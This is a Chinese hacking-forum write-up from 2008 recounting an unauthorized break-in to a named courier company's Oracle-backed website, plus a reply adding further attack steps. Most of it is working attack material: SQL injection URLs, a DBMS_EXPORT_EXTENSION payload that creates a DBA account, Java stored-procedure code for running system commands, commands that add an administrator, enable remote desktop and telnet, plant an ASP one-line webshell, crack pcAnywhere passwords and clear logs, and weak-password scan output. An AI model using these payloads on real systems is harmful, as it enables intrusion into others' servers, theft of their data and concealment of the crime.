对著名快递公司的一次艰难的oracle注入

文章作者:rebeyond
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

● 轻车熟路
一个对新飞鸿有意见的亲密朋友找我说能不能把这个公司的网站给搞了,我一听公司,心想,企业站都是垃圾,好搞,便痛快答应(人品真好!),呵呵,但是后来才发现没我想像的那么简单。
站面如图

asp的页面,啊d和google扫注入点没有,意料之中,工具误差太大!于是旁注,结果只有这一个站,然后便边开着流光扫服务器边习惯性的去站上乱逛去手工找注入点,一会的功夫出来一条链接,如图:


习惯性的单引号,如图

很 明显的注入,猜测源码大体是这样的:select XX from XXX where wen=’云南’;而且数据库类型为oracle,顿时来了精神,很少有这种练手的机会!估计服务器配置肯定不错!由于这种类型的数据库没什么好的工具, 就直接来手工吧,那样比较刺激,据我朋友说这个公司很大,网络也很大,数据库量更是大上加大,难怪用oracle呢,所以放弃后台提权的想法!首先用 union查询确定字段数和暴一些敏感资料,提交如下url:
http://211.154.103.15/server2.asp?wen=四川省’ order by 20–;返回正确,说明此表字段名大于20,继续提交http://211.154.103.15/server2.asp?wen=四川省’ order by 30–;仍然返回正确,经过一些列的猜测然后提交,49返回正确,50出错,确定字段为49个,然后提交以下url:
http://211.154.103.15/server2.asp?wen=四川省’ union select NULL,NULL,……,NULL from dual-中间省略,一共49个null, 由于union查询需要数据类型匹配,否则出错,所以这里用null而不用数字可以避免类型错误,然后提交http://211.154.103.15/server2.asp?wen=四川省’ and 1=2 union select 1,NULL,……,NULL from dual–;出错显示类型不匹配,换成http://211.154.103.15/server2.asp?wen=四川省’ and 1=2 union select ‘1’,NULL,……,NULL from dual–;返回正确,说明第一个是字符型的,但是下面对应位置并没有显示,继续按以上方法尝试后面48个,当试到12和13时,下面对应位置显示了,如图

好了,现在我们就要用下面那两个地方爆我们需要的东西,看下oracle版本,提交http://211.154.103.15/server2.asp?wen=四川省’ and 1=2 union select ‘1’,NULL,……,’11’, (select banner from sys.v_$version where rownum=1),’13’……NULL from dual–;结果如图

继续提交select member from v$logfile where rownum=1获得操作系统版本,如图

确定是windows,下面查看服务器sid,提交select instance_name from v$instance,如图

待会远程连接要用的,下面确定下主机ip,telnet 漏洞页上显示的ip地址的1521端口,为oracle的端口, ,成功,1521开放,下面就本地架设个oracle客户端,利用oracle的那些默认帐号密码登录,尝试n次均失败告终,管理员安全意思不错,表扬 下!^.^
下面就利用oracle的内置函数SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES过滤不严的漏 洞,至于这个函数的具体漏洞形成的原因,这里就不占篇幅了,想知道的可以去我博客,对oracle不熟悉的可以跳过这一部分,继续构造提交:
http://211.154.103.15/server2.asp?wen= 四川省 ‘%20and%20”||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,’BAR’,’DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA%20AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””CREATE USER REBEYOND IDENTIFIED BY REBEYOND””;END;”;END;–‘,’SYS’,0,’1′,0)=”–;这里讲解下,and后面把函数求逻辑或然后与空比 较,这样系统会先求函数值,便会执行我们构造在函数里的语句,这样就往数据库加了个用户名为rebeyond密码为rebeyond的用户,然后执行http://211.154.103.15/server2.asp?wen= 四川省’ and ”||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,’BAR’,’DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””grant sysdba to rebeyond””;END;”;END;–‘,’SYS’,0,’1′,0)=”–便把我们建的用户加为dba权限,下面赋予用户远程连 接权限,提交http://211.154.103.15/server2.asp?wen= 四川省’ and ”||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,’BAR’,’DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””GRANT CONNECT TO rebeyond””;END;”;END;–‘,’SYS’,0,’1′,0)=”–,好了,下面远程连接!
● 峰回路转
本以为建了dba权限的用户,远程连接继续拿权限就完了,但是当我以dba身份登录时却出现这个,如图:

百度了下才知道是服务器那边配置的问题,由于是服务器端的问题,一时不好解决,就暂时先用normal方式登录,连接成功,进去去权限设置那把权限能勾的都勾上,如图:

因为我们毕竟是dba权限的,虽然没以dba方式登录,但是除了开关数据库,其他权限还是都有的,然后就是想办法提权拿服务器,虽然oracle不支持 xp_cmdshell直接执行系统命令,但是对pl\sql的支持是非常另人激动的,因为可以通过建立java存储过程来执行命令,注意这时建完 shell后要对数据库用户赋予对磁盘文件操作的权限(在sqlplus里执行):
call dbms_java.grant_permission(‘REBEYOND’,’java.io.FilePermission’,’c:/a.txt’,’read,write’); 。 cmd打开sqlplus(和oracle客户端一起安装的),输入sqlplus /nolog,然后输入connect [email=rebeyond/rebeyond@(description=(address_list=(address= (protocol=tcp)(host=211.154.103.15)(port=1521)))(connect_data= (SERVICE_NAME=ORCL]rebeyond/rebeyond@(description=(address_list= (address=(protocol=tcp)(host=211.154.103.15)(port=1521)))(connect_data= (SERVICE_NAME=ORCL[/email])));是不是用到了我们前面爆出的服务器sid呢,hoho,连接成功,下面开始执行命令,创建 java存储过程,代码如下:
java存储过程:
第一步:
create or replace and compile
java souRCe named “util”
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}
第二步:
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name ‘util.RunThis(java.lang.String) return integer’;
第三步:
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
创建完之后,就可以通过x := RUN_CMz(dos命令)来执行系统命令了。
建 完存储过程后系统命令执行成功, 如图

但是后来发现这个shell很不爽,如果遇到需要交互的命令就会卡死,刚开始想用”ftp 我的ip地址”检测下能不能执行,结果卡死,我这边防火墙也没反应,不解,后tasklist,发现ftp.exe, 确定对方不能连接外网,可能有防火墙或作了设置,于是用ftp传马思路抛弃,打个systeninfo命令看下系统,是2003,于是打算先建个超级用户 然后开3389,执行exec :x := RUN_CMD(‘net user’)结果卡死,猜测net被删,执行exec :x := RUN_CMD(‘net1 user’);成功,执行exec :x := RUN_CMD(‘net1 user rebeyond rebeyond /add&net1 localgroup administrators rebeyond /add’);成功,下面用reg命令读下3389的状态和端口,执行exec :x := RUN_CMD(‘reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server”‘);发现fDenyTSconnections值为1,说明3389关闭,于是依次执行以下语句开3389:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp” /v PortNumber /t REG_DWORD /d 3389 /f
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 3389 /f
因为cmd一交互就卡死,所以加了个/f强行参数,搞定后运行mstsc连接,结果另人吐血,能连上但是却没有登录窗口,提示说什么” awgina.dll被替换成未知版本”,猜测可能把3389用到的dll给删除了,因为虽然不能登录但可以连接,于是想到了替换sethc.exe,在 shell下依次执行:
exec :x :=RUN_CMD (‘del c:\windows\system32\sethc.exe /f’)
exec :x :=RUN_CMD(‘del C:\WINDOWS\system32\dllcache\sethc.exe /f’)
exec :x :=RUN_CMD(‘copy c:\windows\explorer.exe c:\windows\system32\sethc.exe’),
按五次shift后发现没替换成功,也没删除成功,推断原因只有一个,就是没权限,但是我在前面用java建shell前专门赋予了权限的,不解,百度一 番!发现赋予文件操作权限必须得以dba的方式登录,但是前面说了我们无法以dba方式登录,顿时大脑一片空白,没有写和删除权限,只有运行权限,思路一 下少了很多,继续!!忽然想到了telnet,用reg查看了下telnet服务的状态为禁用,于是执行reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr” /v Start /t REG_DWORD /d 2 /f把telnet服务设置为自动,然后就是想办法让服务器重启开telnet。
●柳暗花明:
shell里执行rundll32.exe user.exe,restartwindows,不一会主机重启了,成功telnet,这样权限我们已经拿到了!但是要向图像界面进军,在telnet 执行netstat -an看了下端口,发现5632,熟悉提权的人应该很熟悉,这是pcanywhere的默认端口,但是怎么才能知道pcanywhere的密码呢?因为不 能连接外网,所以直接传cif文件是不可能的,于是想到了webshell!在telnet里找到站的 目录d:\site,执行echo “<%eval(request(“#”))%>” >d:\site\guestboook.asp,访问成功,然后用海洋一句话提交大马成功如图:

跳转到pcanywhere的cif文件目录下载cif文件并破解,成功得到pcanywhere的密码,如图:

到这基本就结束了,但是pcanywhere远程很不爽,于是还是想开用3389,于是百度搜索原因,发现是3389和pcanywhere冲突的原因 并找到了解决办法,删除某个注册表项就搞定了,在pcanywhere操作就很简单了,搞定后重启服务器,连接对方3389,终于看到了熟悉的登录界面, 用前面建的用户成功登入!如图:

至此整个入侵过程宣告结束!清了下日志修补了下漏洞!闪人!睡觉!

–2008.4.13 by rebeyond

下面qiaolin的回帖:
首先佩服下LZ的实力,鄙人也从未露面过,但是对于ORACLE的入侵,也忍不住插几句。
以下说下鄙人的入侵方式:
端口扫描:
21、80、1521、3389、5631
从80的,LZ已经做过了,也就不重复了。喜欢直接搞1521。
首先扫描ORACLE,SID和弱口令:

[-] Checking host 211.154.103.15
[-] Checking sid (orcl) for common passwords
[-] Account CTXSYS/CTXSYS is locked
[-] Account DBSNMP/DBSNMP found
[-] Enumerating system accounts for SID (orcl)
[-] Succesfully enumerated 34 accounts
[-] Account MDSYS/MDSYS is locked
[-] Account OE/OE is locked
[-] Account OLAPSYS/MANAGER is locked
[-] Account ORDPLUGINS/ORDPLUGINS is locked
[-] Account ORDSYS/ORDSYS is locked
[-] Account OUTLN/OUTLN is locked
[-] Account PM/PM is locked
[-] Account QS_ADM/QS_ADM is locked
[-] Account QS_CB/QS_CB is locked
[-] Account QS_CBADM/QS_CBADM is locked
[-] Account QS_CS/QS_CS is locked
[-] Account QS_ES/QS_ES is locked
[-] Account QS_OS/QS_OS is locked
[-] Account QS_WS/QS_WS is locked
[-] Account RMAN/RMAN is locked
[-] Account SCOTT/TIGER found
[-] Account SH/SH is locked
[-] Account WKSYS/WKSYS is locked
[-] Checking user supplied passwords against sid (orcl)
[-] Checking user supplied dictionary
[-] Account WMSYS/WMSYS is locked
[-] Account XDB/XDB is locked
[-] Account WKPROXY/WKPROXY is locked
[-] Account ODM/ODM is locked
[-] Account ODM_MTR/ODM_MTR is locked
[-] Account OEM_LI-OWC0EIN1THV8_ORCL/ORACLE found
[-] Account E3DATA/ORACLE found
[-] Account TRANSFER_USER/TRANSFER_USER found
[-] Account REBEYOND/REBEYOND found
[-] Querying database for version information

其实DBSNMP 弱口令已经够用了,注入提权成DBA也一样。SID:orcl,不过还是侥幸看下是否有SYS弱口令:

C:\oracle>oracle.exe -quiet dbsnmp/[email protected]:1521/orcl password_file.txt

DBSNMP has weak password DBSNMP [OPEN]
SCOTT has weak password TIGER [OPEN]
OEM_LI-OWC0EIN1THV8_ORCL has weak password ORACLE [OPEN]
REBEYOND has weak password REBEYOND [OPEN]
TRANSFER_USER has weak password TRANSFER_USER [OPEN]
E3DATA has weak password ORACLE [OPEN]

测试了下REBEYOND的权限,发现有DBA权限(LZ留的),喜欢SYS去搞(谁让SYS是最强大的呢),改了SYS的密码, SQLPLUS连接上,通过JAVA接口提权(未测试),3389登陆。(3389也是LZ开的,不过通常没开3389,比较喜欢直接用FTP命令下木马)
C:\oracle_checkpwd_big>sqlplus sys/******@//211.154.103.15:1521/orcl as sysdba

SQL*Plus: Release 10.2.0.1.0 – Production on 星期三 6月 11 10:24:03 2008

Copyright (c) 1982, 2005, Oracle. All rights reserved.

连接到:
Oracle9i Enterprise Edition Release 9.2.0.7.0 – Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.7.0 – Production

SQL>

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

  • ellle

    顶个!不过就如qiaolin的,直接1521更好点,当然如果对方防火墙关闭了1521的话,还得是注入

发表评论